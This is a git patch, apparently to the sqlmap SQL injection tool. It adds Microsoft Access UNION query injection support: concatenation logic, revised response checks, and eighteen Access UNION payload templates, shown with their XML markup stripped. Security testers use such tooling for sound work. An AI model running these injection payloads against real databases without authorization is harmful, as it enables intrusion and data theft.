From 067354b97f5010118c623df4168dd3676a82ef92 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Thu, 7 Jul 2011 13:20:40 +0000 Subject: [PATCH] Revert of last commit and proper fix to detect UNION query SQL injection against Microsoft Access --- lib/core/agent.py | 16 ++ lib/core/settings.py | 2 +- lib/techniques/union/test.py | 6 +- xml/payloads.xml | 396 +++++++++++++++++++++++++++++++++++ 4 files changed, 417 insertions(+), 3 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index b4cf4cbba..c1ba3833d 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -500,6 +500,22 @@ class Agent: elif fieldsNoSelect: concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop) + elif Backend.isDbms(DBMS.ACCESS): + if fieldsExists: + concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1) + concatenatedQuery += "&'%s'" % kb.misc.stop + elif fieldsSelectCase: + concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&(SELECT " % kb.misc.start, 1) + concatenatedQuery += ")&'%s'" % kb.misc.stop + elif fieldsSelectFrom: + concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1) + concatenatedQuery = concatenatedQuery.replace(" FROM ", "&'%s' FROM " % kb.misc.stop, 1) + elif fieldsSelect: + concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1) + concatenatedQuery += "&'%s'" % kb.misc.stop + elif fieldsNoSelect: + concatenatedQuery = "'%s'&%s&'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop) + else: concatenatedQuery = query diff --git a/lib/core/settings.py b/lib/core/settings.py index 4758392f9..3bb7983a5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -183,7 +183,7 @@ USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" ) FROM_TABLE = { DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects%00", + DBMS.ACCESS: " FROM MSysAccessObjects", DBMS.FIREBIRD: " FROM RDB$DATABASE", DBMS.MAXDB: " FROM VERSIONS", DBMS.DB2: " FROM SYSIBM.SYSDUMMY1" diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 1796b2e21..a883d3b51 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -121,6 +121,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe for position in positions: # Prepare expression with delimiters randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) + phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryUnescaped = unescaper.unescape(randQueryProcessed) @@ -134,13 +135,14 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ payload, True) or "") - if content and randQuery in content: + if content and phrase in content: validPayload = payload vector = (position, count, comment, prefix, suffix, kb.uChar, where) if where == PAYLOAD.WHERE.ORIGINAL: # Prepare expression with delimiters randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) + phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop) randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2) @@ -152,7 +154,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - if content and ((randQuery in content and randQuery2 not in content) or (randQuery not in content and randQuery2 in content)): + if content and ((randQuery in content and phrase2 not in content) or (randQuery not in content and phrase2 in content)): vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE) unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError() diff --git a/xml/payloads.xml b/xml/payloads.xml index 426dd4d89..a5af03428 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -2893,6 +2893,402 @@ Formats: + + Microsoft Access UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + [COLSTART]-[COLSTOP] + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + [COLSTART]-[COLSTOP] + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([CHAR]) - 1 to 10 columns + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 1-10 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query (NULL) - 1 to 10 columns + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 1-10 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([RANDNUM]) - 1 to 10 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 1-10 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([CHAR]) - 11 to 20 columns + 3 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 11-20 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query (NULL) - 11 to 20 columns + 3 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 11-20 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([RANDNUM]) - 11 to 20 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 11-20 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([CHAR]) - 21 to 30 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 21-30 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query (NULL) - 21 to 30 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 21-30 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([RANDNUM]) - 21 to 30 columns + 3 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 21-30 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([CHAR]) - 31 to 40 columns + 3 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 31-40 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query (NULL) - 31 to 40 columns + 3 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 31-40 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([RANDNUM]) - 31 to 40 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 31-40 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([CHAR]) - 41 to 50 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 41-50 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query (NULL) - 41 to 50 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 41-50 + + + + +
+ Microsoft Access +
+ + + + Microsoft Access UNION query ([RANDNUM]) - 41 to 50 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 41-50 + + + + +
+ Microsoft Access +
+ + Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) 3